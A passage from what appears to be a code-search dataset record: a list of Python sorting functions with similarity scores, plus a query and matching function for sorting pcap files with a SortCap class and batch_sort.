[f.split(os.sep)[-2] for f in filenames]\n idx = [hashes.index(h) for i, h in enumerate(ref_hashes)]\n filenames = [filenames[i] for i in idx]\n return filenames", "def flist(file_pattern, *sorted_args, **sorted_kwargs):\n files = glob.glob(file_pattern)\n return sorted(files, *sorted_args, **sorted_kwargs)", "def sort():\n return -1", "def test_multi_template():\n data = []\n data.extend([\"{}_data.json\".format(i) for i in range(50)])\n data.extend([\"{}_log.csv\".format(i) for i in range(50)])\n data.extend([\"filename_{}.py\".format(i) for i in range(50)])\n data.extend([\"stuff_{}.py\".format(i) for i in range(50)])\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def sort(self):\n for _ in self.stage1():\n yield\n for _ in self.stage2():\n yield", "def merge_sort(items):\r\n # TODO: Check if list is so small it's already sorted (base case)\r\n # TODO: Split items list into approximately equal halves\r\n # TODO: Sort each half by recursively calling merge sort\r\n # TODO: Merge sorted halves into one list in sorted order\r", "def sort(self):\n\n img_files = os.listdir(self.path)\n\n img_list = {}\n\n for img_file in img_files:\n filename = os.path.join(self.path, img_file)\n\n try:\n img = Image.open(filename)\n except:\n continue\n\n print \"Analyzing %s\" % img_file\n\n points = self.points(img.size[0], img.size[1])\n key = \"\"\n for point in points:\n\n # Get the average color for each point\n ave_points = self.diamond_points(point[0], point[1])\n red = 0\n green = 0\n blue = 0\n for ave_point in ave_points:\n try:\n rgb = img.getpixel(ave_point)\n red += rgb[0]\n green += rgb[1]\n blue += rgb[2]\n except IndexError:\n pass\n red /= len(ave_points)\n green /= len(ave_points)\n blue /= len(ave_points)\n\n # Bitdepths:\n # 12 bit - 4096 colors, range 0-F, divide by 16\n # 9 bit - 512 colors, range 0-7, divide by 32\n # 6 bit - 64 colors, range 0-3, divide by 64\n # 3 bit - 8 colors, range 0-1, divide by 128\n\n if self.num_colors == 8:\n div = 128\n elif self.num_colors == 64:\n div = 64\n elif self.num_colors == 512:\n div 
= 32\n elif self.num_colors == 4096:\n div = 16\n else:\n self.usage()\n\n # Lower the bitdepth\n red = int(red / div)\n green = int(green / div)\n blue = int(blue / div)\n\n # Add to the key\n key += \"%x%x%x\" % (red, green, blue)\n\n # Add the key if needed\n if key not in img_list:\n img_list[key] = []\n\n # Add the file to the list\n img_list[key].append(img_file)\n\n # Go through and rename the files, based on the img_list dictionary\n # and the prefix\n num = 1\n for img in sorted(img_list.iterkeys()):\n for filename in sorted(img_list[img]):\n name, ext = os.path.splitext(filename)\n new_filename = \"%s%04d%s\" % (self.prefix, num, ext)\n full_filename = os.path.join(self.path, filename)\n full_new_filename = os.path.join(self.path, new_filename)\n if os.path.isfile(full_new_filename):\n print \"File %s exists - aborting!\" % full_new_filename\n return\n\n os.rename(full_filename, full_new_filename)\n print \"Renamed %s to %s.\" % (filename, new_filename)\n num += 1", "def sorting_alg(self, my_list):\n for i in range(len(my_list)):\n for j in range(i+1, len(my_list)):\n if my_list[i] > my_list[j]:\n my_list[i], my_list[j] = my_list[j], my_list[i]\n #print(my_list)\n #sleep(1)\n return my_list", "def sort(data,start,end):\n if start < end:\n partition_index=partition(data,start,end)\n sort(data,start,partition_index-1)\n sort(data,partition_index+1,end)", "def sortLoadFiles(self):\n self.loadFiles.sort()\n self.loadFiles.sort(lambda a,b: cmp(a[-3:].lower(), b[-3:].lower()))", "def merge_quick_sort(L):\n list1 = []\n list2 = []\n (evens, odds) = merge_sort.split(L)\n list1 += quick_sort.quick_sort(evens)\n list2 += quick_sort.quick_sort(odds)\n x = merge_sort.merge(list1,list2)\n return x", "def main(args):\n\tunsorted_array = []\n\n\tif args.order == 'ASC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\n\tif args.order == 'DESC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tunsorted_array = list(reversed(unsorted_array))\n\n\tif args.order == 'RAND':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tnp.random.shuffle(unsorted_array)\n\n\tsize = int(args.instancesize)\n\n\tif args.algorithm == 'all':\n\t\tselection_sort(unsorted_array, size)\n\t\tinsertion_sort(unsorted_array, size)\n\t\tshell_sort(unsorted_array, size)\n\t\tmerge_sort(unsorted_array, size)\n\t\theap_sort(unsorted_array, size)\n\t\tquick_sort(unsorted_array, size)\n\n\tif args.algorithm == 'selection':\n\t\tselection_sort(unsorted_array, size)\n\n\tif args.algorithm == 'insertion':\n\t\tinsertion_sort(unsorted_array, size)\n\n\tif args.algorithm == 'shell':\n\t\tshell_sort(unsorted_array, size)\n\n\tif args.algorithm == 'merge':\n\t\tmerge_sort(unsorted_array, size)\n\n\tif args.algorithm == 'heap':\n\t\theap_sort(unsorted_array, size)\n\n\tif args.algorithm == 'quick':\n\t\tquick_sort(unsorted_array, size)", "def shell_sort(l):\n\tdef __updated_h(h):\n\t\th = int(h / 3)\n\t\t\n\tdef __max_h(h):\n\t\twhile h < int(len(l) / 3):\n\t\t\th = 3 * h + 1\n\t\treturn h\n\n\th = __max_h()\n\t\n\twhile h >= 1:\n\n\t\t# h-sort the array\n\t\tfor i in range(h, len(l)):\n\t\t\tfor j in range(i, h, -h):\n\t\t\t\tif l[j] < l[j - h]:\n\t\t\t\t\t__swap(l, j, j-h)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\th = __updated_h(h)", "def sort_all(batch, lens):\n\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\n return sorted_all[2:], sorted_all[1]", "def sort_all(batch, lens):\r\n unsorted_all = 
[lens] + [range(len(lens))] + list(batch)\r\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\r\n return sorted_all[2:], sorted_all[1]", "def main():\n extension_to_category = {}\n # Change to FileToSort directory\n os.chdir(\"FilesToSort\")\n\n # Loop through each file in the (current) directory\n for filename in os.listdir('.'):\n # Ignore directories, just process files\n if os.path.isdir(filename):\n continue\n\n extension = filename.split(\".\")[-1]\n if extension not in extension_to_category:\n category = input(\"What category would you like to sort {} files into?\".format(extension))\n extension_to_category[extension] = category\n print(extension_to_category.items())\n # In case user put in existing folder\n try:\n os.mkdir(category)\n except FileExistsError:\n pass\n\n # Move files to directories based on categories by renaming\n os.rename(filename, \"{}/{}\".format(extension_to_category[extension], filename))", "def test_pyt_batchsort_train(self):\n # Next, check that training works\n dt_and_preprocess = [\n ('train', False),\n ('train:stream', False),\n ('train', True)\n ]\n for dt, preprocess in dt_and_preprocess:\n defaults = parser_defaults.copy()\n defaults['datatype'] = dt\n defaults['pytorch_preprocess'] = preprocess\n defaults['pytorch_teacher_batch_sort'] = True\n defaults['batchsize'] = 32\n if preprocess:\n defaults['batch_sort_field'] = 'text_vec'\n str_output, _, _ = testing_utils.train_model(defaults)\n self.assertTrue(\n solved_task(str_output),\n 'Teacher could not teach seq2seq with batch sort '\n 'and args {} and output {}'\n .format((dt, preprocess), str_output)\n )", "def sort_file(file_path):\n sorted_handle, tmp_path = tempfile.mkstemp(prefix='gzipi')\n os.close(sorted_handle)\n shutil.move(file_path, tmp_path)\n\n #\n # We use sort from GNU toolchain here, because index file can be pretty big.\n #\n sort_flags = [\n '--field-separator=|',\n '--key=1,1',\n '--parallel=%s' % _SORT_CPU_COUNT,\n '--buffer-size=%s' % _SORT_BUFFER_SIZE\n ]\n gzcat = plumbum.local[get_exe('gzcat', 'zcat')][tmp_path]\n cat = plumbum.local['cat'][tmp_path]\n gzip_exe = plumbum.local['gzip']['--stdout']\n sort = plumbum.local[get_exe('gsort', 'sort')][sort_flags]\n\n file_path = os.path.abspath(file_path)\n is_gzipped = file_path.endswith('.gz')\n\n with plumbum.local.env(LC_ALL='C'):\n try:\n if is_gzipped:\n return ((gzcat | sort | gzip_exe) > file_path) & plumbum.FG\n else:\n return ((cat | sort) > file_path)()\n finally:\n os.remove(tmp_path)", "def quick_sort(lst, first, last):\r\n if first < last:\r\n split_marker = split_list(lst, first, last)\r\n\r\n quick_sort(lst, split_marker + 1, last)\r\n quick_sort(lst, first, split_marker - 1)", "def sort(data, sort_size=500):\n\n buf = []\n for sample in data:\n buf.append(sample)\n if len(buf) >= sort_size:\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x\n buf = []\n # The sample left over\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x", "def sort(self):\n \n ct=[]\n rt=[]\n wr=[]\n # search for tags that aren't in the right position\n for i in range(len(self.contigs)):\n c = self.contigs[i]\n if c.wa:\n if not self.wa:\n self.wa=[]\n self.wa.extend(c.wa)\n if c.ct:\n newcts=[ct_tag for ct_tag in c.ct if ct_tag.name!=c.name]\n map(self.contigs[i].ct.remove,newcts)\n ct.extend(newcts)\n for j in range(len(c.reads)):\n r = c.reads[j]\n if r.rt:\n newrts=[rt_tag for rt_tag in r.rt if rt_tag.name!=r.rd.name]\n map(self.contigs[i].reads[j].rt.remove,newrts)\n 
rt.extend(newrts)\n if r.wr:\n newwrs=[wr_tag for wr_tag in r.wr if wr_tag.name!=r.rd.name]\n map(self.contigs[i].reads[j].wr.remove,newwrs)\n wr.extend(newwrs)\n # now sort them into their proper place\n for i in range(len(self.contigs)):\n c = self.contigs[i]\n for ct_tag in ct:\n if ct_tag.name==c.name:\n if self.contigs[i].ct is None:\n self.contigs[i].ct=[]\n self.contigs[i].ct.append(ct_tag)\n if rt or wr:\n for j in range(len(c.reads)):\n r = c.reads[j]\n for rt_tag in rt:\n if rt_tag.name==r.rd.name:\n if self.contigs[i].reads[j].rt is None:\n self.contigs[i].reads[j].rt=[]\n self.contigs[i].reads[j].rt.append(rt_tag)\n for wr_tag in wr:\n if wr_tag.name==r.rd.name:\n if self.contigs[i].reads[j].wr is None:\n self.contigs[i].reads[j].wr=[]\n self.contigs[i].reads[j].wr.append(wr_tag)", "def cleanup(job, tempOutputFileStoreID, outputFile, cores=1, memory=sortMemory, disk=\"3G\"):\n fileName = job.fileStore.readGlobalFile(tempOutputFileStoreID)\n shutil.copyfile(fileName, outputFile)\n job.fileStore.logToMaster(\"Finished copying sorted file to output: %s\" % outputFile)", "def sort_1(l):\n pass", "def intro_sort(data):\n recurssion_depth=2*math.log(len(data))\n if len(data) < 15:\n insertion_sort(data)\n elif recurssion_depth==0:\n merge_sort(data)\n else:\n quick_sort(data)", "def write_sorting(sorting, save_path):\n assert HAVE_SBEX, SHYBRIDSortingExtractor.installation_mesg\n dump = np.empty((0, 2))\n\n for unit_id in sorting.get_unit_ids():\n spikes = sorting.get_unit_spike_train(unit_id)[:, np.newaxis]\n expanded_id = (np.ones(spikes.size) * unit_id)[:, np.newaxis]\n tmp_concat = np.concatenate((expanded_id, spikes), axis=1)\n\n dump = np.concatenate((dump, tmp_concat), axis=0)\n\n sorting_fn = os.path.join(save_path, 'initial_sorting.csv')\n np.savetxt(sorting_fn, dump, delimiter=',', fmt='%i')", "def sort(self): # sort all entries to make room for new ones, determine best and worst\n ns = self.num_stored.value\n ys = np.asarray(self.ys[:ns])\n yi = ys.argsort()\n sortRuns = []\n for i in range(len(yi)):\n y = ys[yi[i]]\n xs = self.get_x(yi[i])\n sortRuns.append((y, xs))\n numStored = min(len(sortRuns),int(0.9*self.capacity)) # keep 90% best \n for i in range(numStored):\n self.replace(i, sortRuns[i][0], sortRuns[i][1])\n self.num_sorted.value = numStored \n self.num_stored.value = numStored \n return numStored", "def hxlsort():\n run_script(hxlsort_main)", "def sortFiles(files):\n def sortKey(file):\n dirFile = file.lower().rsplit('\\\\',1)\n if len(dirFile) == 1: dirFile.insert(0,'')\n return dirFile\n sortKeys = dict((x,sortKey(x)) for x in files)\n return sorted(files,key=lambda x: sortKeys[x])", "def quick_sort(items):\n if len(items) &gt; 1:\n pivot_index = len(items) / 2\n smaller_items = []\n larger_items = []\n \n for i, val in enumerate(items):\n if i != pivot_index:\n if val &lt; items[pivot_index]:\n smaller_items.append(val)\n else:\n larger_items.append(val)\n \n quick_sort(smaller_items)\n quick_sort(larger_items)\n items[:] = smaller_items + [items[pivot_index]] + larger_items", "def sort_bam(self, bam_in, bam_sorted_out):\n self.cmd(\"{picard_cmd}/SortSam.jar\\\n INPUT='{bam_in}'\\\n OUTPUT='{bam_sorted_out}'\\\n SORT_ORDER=coordinate CREATE_MD5_FILE=false\\\n CREATE_INDEX=false MAX_RECORDS_IN_RAM=5000000\\\n VALIDATION_STRINGENCY=LENIENT\\\n QUIET=false COMPRESSION_LEVEL=5 TMP_DIR='{local_temp_dir}'\"\n .format(\n picard_cmd=self.cmds[\"picard\"],\n bam_in=bam_in,\n bam_sorted_out=bam_sorted_out,\n local_temp_dir=self.local_temp_dir,\n ),\n on_error=lambda: 
self.create_error_file(bam_sorted_out),\n shell=True)\n if self.remove_intermediate:\n self.rm(bam_in)", "def sort(leg=True, reportsDir = \"./reports/\"):\n if leg:\n directory = reportsDir + \"leg/\"\n else:\n directory = reportsDir + \"mal/\"\n\n dirFiles = glob.glob(directory+\"*.json\")\n num, broken = 0, 0\n\n for i, f in enumerate(dirFiles):\n try:\n if numProcs(f) == 1:\n if isThereApiCalls(f):\n num += 1\n move(f, directory + \"oneproc\")\n else:\n broken += 1\n move(f, directory + \"broken/\")\n elif not isThereApiCalls(f):\n broken += 1\n move(f, directory + \"broken/\")\n except KeyError:\n move(f, directory + \"broken/\")\n broken += 1\n cls()\n print(\"Filename: \", f)\n print(\"Progress: {0}/{1}. One process files: {2}. Broken: {3}\".format(i, len(dirFiles), num, broken))" ]
[ "0.72347873", "0.69368804", "0.66853625", "0.66780645", "0.6673519", "0.65403235", "0.6349198", "0.61560905", "0.60991603", "0.6048404", "0.60408694", "0.60184044", "0.6008325", "0.59858507", "0.59529555", "0.5915996", "0.5901437", "0.59011704", "0.58594245", "0.5847667", "0.5809564", "0.58032763", "0.5802787", "0.5792274", "0.5777833", "0.57763976", "0.57625294", "0.5745039", "0.5744863", "0.57415825", "0.572754", "0.5722941", "0.5722214", "0.57209635", "0.57094264", "0.57038283", "0.56962544", "0.569602", "0.5691955", "0.56910926", "0.56831694", "0.56747", "0.5648224", "0.56449723", "0.56015253", "0.5573914", "0.55713767", "0.5569842", "0.55439943", "0.55387634", "0.5524626", "0.5523936", "0.5518929", "0.55157787", "0.55082554", "0.54918957", "0.54866034", "0.54861027", "0.54860187", "0.5485201", "0.548011", "0.54798746", "0.54784054", "0.5477", "0.54765904", "0.5475684", "0.5474327", "0.54716283", "0.5461002", "0.54593456", "0.54585177", "0.54486006", "0.5447849", "0.54414135", "0.5441404", "0.5431145", "0.5429048", "0.5421495", "0.54196155", "0.54191345", "0.54164493", "0.5403593", "0.5402502", "0.5395178", "0.53946364", "0.53943264", "0.53874576", "0.5387225", "0.5378769", "0.53761345", "0.53750604", "0.5374769", "0.537475", "0.5353128", "0.53529346", "0.53444797", "0.5342736", "0.5341477", "0.53342456", "0.5333347" ]
0.68566626
2
Use SortCap class together with batch_sort to sort a pcap
def sort_pcap(inpath, outpath):
    inc = SortCap(inpath)
    batch_sort(inc, outpath, output_class=lambda path: WriteCap(path, linktype=inc.linktype))
    return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def external_sort(input_file_name, block_size, output_file_name=None):\n if output_file_name is None:\n output_file_name = input_file_name\n sorter = ExternalSort(input_file_name, block_size, output_file_name)\n sorter.run()", "def step020():\n logger.logMessage('Begin: Sorting records')\n sortCommand = 'sort {0} -t \\';\\' --key 2 -o {1}'.format(candidatesFile,sortedCandidatesFile) \n rc = os.system(sortCommand)\n if rc != 0:\n raise Exception('Error returned by sort program: {0:d}'.format(rc))\n logger.logMessage('End : Sorting records')", "def f_way_sort(buffer_size: int, input_paths: list, output_path: str):\n pass", "def volume_sort(self):\n self.jobs_sorted = sorted(\n self.jobs,\n key=lambda job: (job['height'], job['width'] * job['height']),\n # key=lambda job: job['width'] * job['height'],\n reverse=True)", "def batchSort(input, output, key, buffer_size, tempdir):\n def merge(key=None, *iterables):\n if key is None:\n keyed_iterables = iterables\n else:\n Keyed = namedtuple(\"Keyed\", [\"key\", \"obj\"])\n keyed_iterables = [(Keyed(key(obj), obj) for obj in iterable)\n for iterable in iterables]\n for element in heapq.merge(*keyed_iterables):\n yield element.obj\n\n tempdir = os.path.join(tempdir, str(uuid.uuid4()))\n os.makedirs(tempdir)\n chunks = []\n try:\n with open(input, 'rb', 64 * 1024) as inputFile:\n inputIter = iter(inputFile)\n while True:\n current_chunk = list(islice(inputIter, buffer_size))\n if not current_chunk:\n break\n current_chunk.sort(key=key)\n output_chunk = open(\n os.path.join(tempdir, '%06i' % len(chunks)), 'w+b',\n 64 * 1024)\n chunks.append(output_chunk)\n output_chunk.writelines(current_chunk)\n output_chunk.flush()\n output_chunk.seek(0)\n with open(output, 'wb', 64 * 1024) as output_file:\n output_file.writelines(merge(key, *chunks))\n finally:\n for chunk in chunks:\n try:\n chunk.close()\n os.remove(chunk.name)\n except Exception:\n pass\n print(\"sorted file %s ready\" % (output))", "def sort_grouped_packets(self, grouped_packets):\n for group in grouped_packets:\n group.sort(key=lambda x: x.time, reverse=False)\n return grouped_packets", "def testSorting(self):\n mtt.makeTempDirParent()\n shuffledTargets = list(g_targetBlocks)\n for i in xrange(0, 200):\n tmpDir = os.path.abspath(mtt.makeTempDir('sorting'))\n random.shuffle(g_nonTargetBlocks)\n random.shuffle(shuffledTargets)\n shuffledBlocks = list(shuffledTargets)\n lower = 0\n for j in xrange(0, len(g_nonTargetBlocks)):\n # randomly insert the non target blocks, but keep a record\n # of their relative order.\n index = random.randint(lower, len(shuffledBlocks))\n shuffledBlocks.insert(index, g_nonTargetBlocks[j])\n lower = index + 1\n testMaf = mtt.testFile(os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n ''.join(shuffledBlocks), g_headers)\n parent = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n cmd = [os.path.abspath(os.path.join(parent, 'test', 'mafSorter'))]\n cmd += ['--maf', os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n '--seq', 'hg18.chr7']\n outpipes = [os.path.abspath(os.path.join(tmpDir, 'sorted.maf'))]\n mtt.recordCommands([cmd], tmpDir, outPipes=outpipes)\n mtt.runCommandsS([cmd], tmpDir, outPipes=outpipes)\n self.assertTrue(mafIsSorted(os.path.join(tmpDir, 'sorted.maf')))\n mtt.removeDir(tmpDir)", "def sort(data, sort_size=500):\n\n buf = []\n for sample in data:\n buf.append(sample)\n if len(buf) >= sort_size:\n buf.sort(key=lambda x: x[\"feat\"].size(0))\n for x in buf:\n yield x\n buf = []\n # The sample left over\n buf.sort(key=lambda x: 
x[\"feat\"].size(0))\n for x in buf:\n yield x", "def test_benchmark_sorted(benchmark, benchmark_items_fixture):\n do_benchmark(benchmark_items_fixture, sorted, benchmark)", "def array_sort():\n to_concat = []\n for centroid_rgb, cluster in itertools.izip(centroids_rgb, self.clusters):\n # no need to revisit ratio\n new_idxed_arr = tf.concat(1,[tf.slice(cluster, [0,0], [-1,2]),\n tf.tile(tf.expand_dims(\n tf.constant(centroid_rgb), 0),\n multiples=[len(cluster.eval()), 1])])\n to_concat.append(new_idxed_arr)\n\n concated = tf.concat(0, to_concat)\n sorted_arr = np.array(sorted(concated.eval().tolist()), dtype=np.uint8)[:, 2:]\n\n new_img = Image.fromarray(sorted_arr.reshape([self.m, self.n, self.chann]))\n if save:\n new_img.save(outfile, format=format_)\n os.popen(\"open '{}'\".format(outfile))\n else:\n new_img.show()", "def sort(self):\n self.deckcards.sort()", "def sort(self):\n\t\tself.servers = sorted(self.servers, key=lambda s: s.load)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.distance_class)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.country == self.locale_info.country, reverse=True)", "def custom_sort(arr):\n pass", "def sortby(self):\n ...", "def batch_sort(input_iterator, output_path, buffer_size=1024**2, output_class=None):\n if not output_class:\n output_class = input_iterator.__class__\n\n chunks = []\n try:\n while True:\n current_chunk = list(islice(input_iterator,buffer_size))\n if not current_chunk:\n break\n current_chunk.sort()\n output_chunk_name = os.path.join(TMPD, \"%06i\" % len(chunks))\n output_chunk = output_class(output_chunk_name)\n\n for elem in current_chunk:\n output_chunk.write(elem.obj)\n output_chunk.close()\n chunks.append(input_iterator.__class__(output_chunk_name))\n\n output_file = output_class(output_path)\n for elem in heapq.merge(*chunks):\n output_file.write(elem.obj)\n output_file.close()\n except:\n raise\n finally:\n for chunk in chunks:\n try:\n chunk.close()\n os.remove(chunk.name)\n except Exception:\n pass", "def oldsortslice(self):\n ...", "def test_list_vips_sort(self):\n resources = \"vips\"\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\n self._test_list_resources(resources, cmd,\n sort_key=[\"name\", \"id\"],\n sort_dir=[\"asc\", \"desc\"])", "def sort(self):\r\n\t\treturn sorted(self.sample)", "def __sort_by_priority(self, input_list):\n print(\"========================Start of __sort_by_priority() Method *\")\n # temp1 = input_list.sort(key=operator.attrgetter(\"submission_time\"))\n # temp1 = temp1.sort(key=operator.attrgetter(str(\"__req_start\")))\n\n # sending one item from list at a time to be enqueued ensuring sorted-nes\n for j in range(len(input_list)):\n self.current_queue.enqueue(input_list[j])\n # print(\"Enqueued the FF item from Input list :\" + input_list[j].showFlightInfo())\n # print(\"*De-queued the FF item from Queue :\" + self.current_queue.dequeue(j).showFlightInfo())\n \"\"\"\n if input_list[i].get_reqStart <= self.current_queue.first.get_reqStart:\n if input_list[i].get_submissionTime <= self.current_queue.first.get_submissionTime:\n temp = self.current_queue.first\n self.current_queue.first = input_list[i]\n self.current_queue.first.next = temp\"\"\"\n print(\"========================End of __sort_by_priority() Method *\")", "def sort_reads(self): \n if not self.sampling:\n self.convert_to_array()\n self.reads = self.reads[self.reads[:,0].argsort()]", "def test_list_vips_sort(self):\r\n resources = \"vips\"\r\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\r\n 
self._test_list_resources(resources, cmd,\r\n sort_key=[\"name\", \"id\"],\r\n sort_dir=[\"asc\", \"desc\"])", "def sort(self):\r\n return self.sort_targets([self])", "def sort(self):\n self.cards.sort()", "def sort(self):\n self.cards.sort()", "def order_test(self, attack_args, seed=None, cleanup=True, pcap=Lib.test_pcap,\n flag_write_file=False, flag_recalculate_stats=False, flag_print_statistics=False,\n attack_sub_dir=True, test_sub_dir=True):\n\n controller = Ctrl.Controller(pcap_file_path=pcap, do_extra_tests=False, non_verbose=True)\n controller.load_pcap_statistics(flag_write_file, flag_recalculate_stats, flag_print_statistics,\n intervals=[], delete=True)\n controller.process_attacks(attack_args, [[seed]])\n\n caller_function = inspect.stack()[1].function\n\n try:\n path = controller.pcap_dest_path\n file = pcr.RawPcapReader(path)\n packet_a = file.read_packet()\n packet_b = file.read_packet()\n i = 0\n\n while packet_b is not None:\n\n time_a = [packet_a[1].sec, packet_a[1].usec]\n time_b = [packet_b[1].sec, packet_b[1].usec]\n\n if time_a[0] > time_b[0]:\n file.close()\n self.fail(\"Packet order incorrect at: \" + str(i + 1) + \"-\" + str(i + 2) +\n \". Current time: \" + str(time_a) + \" Next time: \" + str(time_b))\n elif time_a[0] == time_b[0]:\n if time_a[1] > time_b[1]:\n file.close()\n self.fail(\"Packet order incorrect at: \" + str(i + 1) + \"-\" + str(i + 2) +\n \". Current time: \" + str(time_a) + \" Next time: \" + str(time_b))\n\n packet_a = packet_b\n packet_b = file.read_packet()\n i += 1\n\n file.close()\n\n except self.failureException:\n Lib.rename_test_result_files(controller, caller_function, attack_sub_dir, test_sub_dir)\n raise\n\n if cleanup:\n Lib.clean_up(controller)\n else:\n Lib.rename_test_result_files(controller, caller_function, attack_sub_dir, test_sub_dir)", "def keysort(*args, **kwargs): # real signature unknown\n pass", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def process_pcap(self):\n # Create Core Controller\n controller = Controller(self.args.input, self.args.extraTests, self.args.non_verbose, self.args.output,\n self.args.debug)\n\n if not self.args.skip:\n # Load PCAP statistics\n recalculate_intervals = None\n if self.args.recalculate_delete:\n recalculate_intervals = True\n elif self.args.recalculate_yes:\n recalculate_intervals = True\n self.args.recalculate = True\n elif self.args.recalculate_no:\n recalculate_intervals = False\n self.args.recalculate = True\n controller.load_pcap_statistics(self.args.export, self.args.recalculate, self.args.statistics,\n self.args.statistics_interval, self.args.recalculate_delete,\n recalculate_intervals)\n\n if self.args.list_intervals:\n controller.list_interval_statistics()\n\n # Create statistics plots\n if self.args.plot is not None:\n do_entropy = False\n if 
self.args.extraTests:\n do_entropy = True\n controller.create_statistics_plot(self.args.plot, do_entropy)\n\n # Check rng seed\n if not isinstance(self.args.rngSeed, list):\n self.args.rngSeed = [self.args.rngSeed]\n\n # Process attack(s) with given attack params\n if self.args.attack is not None:\n # If attack is present, load attack with params\n controller.process_attacks(self.args.attack, self.args.rngSeed, self.args.time, self.args.inject_empty)\n\n # Parameter -q without arguments was given -> go into query loop\n if self.args.query == [None]:\n controller.enter_query_mode()\n # Parameter -q with arguments was given -> process query\n elif self.args.query is not None:\n controller.process_db_queries(self.args.query, True)", "def test_for_different_input_sizes_asc(self):\n for size in range(1, 50):\n c = [random.randint(1, 1000) for _ in range(size)]\n\n copy = c\n\n # sort using mergeSort and using builtin sort\n sort.asc(c)\n copy.sort()\n\n assert c == copy", "def _sort_records(self):\n self.records.sort(reverse=True, key=lambda record: record.timestamp)", "def mysorted(*args, **kwargs):\n _ = kwargs.pop(\"chunksize\", None)\n return sorted(*args, **kwargs)", "def sort(self, limit=0, offset=0, distance=False):\n if distance:\n self.features.sort(\n key=lambda x: (x['properties']['_distance_'],\n x['properties']['_collection_rank_']),\n )\n else:\n self.features.sort(\n key=lambda x: (-x['properties']['_score_'],\n x['properties']['_sort_tiebreaker_']),\n )\n\n if limit:\n self.features = self.features[offset:limit + offset]\n elif offset:\n self.features = self.features[offset:]\n\n self.offset = offset", "def reorder_examples(self):\n self.example_wise_shrink(Ordering, key=sort_key)", "def sort_vnet(model, option='traffic'): \n failed_dict = model.failed_dict\n vnet_info = model.get_vnet_info()\n vnets = model.vnets\n vnet_traffic = {}\n for vn in vnets:\n failed_id = failed_dict[vn.vnet_id]\n failed_node_traffic = vnet_info[vn.vnet_id]['traffic'][failed_id][1]\n vnet_traffic[vn] = round(failed_node_traffic, 5)\n sorted_vn = sorted(vnet_traffic.iteritems(), key=operator.itemgetter(1)) \n sorted_vn.reverse()\n return sorted_vn", "def __init__(self, pcap):\n self.pcap = pcap\n self.actions = []\n self._parse_pcap()", "def sortbatch(q_batch, a_batch, q_lens, a_lens):\n maxlen_q = max(q_lens)\n maxlen_a = max(a_lens)\n q=q_batch[:,:maxlen_q-1]\n a=a_batch[:,:maxlen_a-1]\n sorted_idx = torch.LongTensor(a_lens.numpy().argsort()[::-1].copy())\n return q[sorted_idx], a[sorted_idx], q_lens[sorted_idx], a_lens[sorted_idx]", "def sort(self):\n # Sort here actually uses the tuple comparison we defined in the Card class\n self.cards.sort()", "def sort_all(batch, lens):\n\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\n return sorted_all[2:], sorted_all[1]", "def tweet_sort(twitter_data, results, cmp):\r\n \r\n # Insertion sort\r\n for i in range(1, len(results)):\r\n current = results[i]\r\n position = i\r\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\r\n results[position] = results[position - 1]\r\n position = position - 1 \r\n results[position] = current", "def main(input, output, overwrite, port):\r\n\tpcap_filepath = pathlib.Path(input)\r\n\tif port is not None:\r\n\t\tcsv_filepath = convert_to_csv(pcap_filepath, overwrite, True, port)\r\n\telse:\r\n\t\tcsv_filepath = convert_to_csv(pcap_filepath, overwrite)\r\n\t\r\n\ttry:\r\n\t\tsrt_packets = 
extract_srt_packets(csv_filepath)\r\n\texcept (UnexpectedColumnsNumber, EmptyCSV, NoUDPPacketsFound, NoSRTPacketsFound) as error:\r\n\t\tprint(f'{error}')\r\n\t\treturn\r\n\t\t\r\n\tindex = SRTDataIndex(srt_packets)\r\n\tdf = srt_packets[index.data_pkts_org]\r\n\t(df['srt.timestamp'] / 1000000.0).to_csv(output, index=False, header=False)\r\n\t\r\n\t# TODO: Plotting the histogram of packets by 10 ms bins.\r\n\t# The code below is missing the end time in the arrange() function.\r\n\t#x = np.arange(0, 27, 0.01, dtype = float)\r\n\t#fig, axis = plt.subplots(figsize =(10, 5))\r\n\t#axis.hist((df['srt.timestamp'] / 1000000.0), bins = x)\r\n\t#plt.show()\r\n\r\n\treturn", "def test_sort():\n data = [\"filename_{}.py\".format(i) for i in range(200)]\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def bubble_sort(dataset):\n\t# start with array length and decrement each time \n\tarrayLen = len(dataset)\n\tbubbleIndex = len(dataset) - 1\n\twhile bubbleIndex != 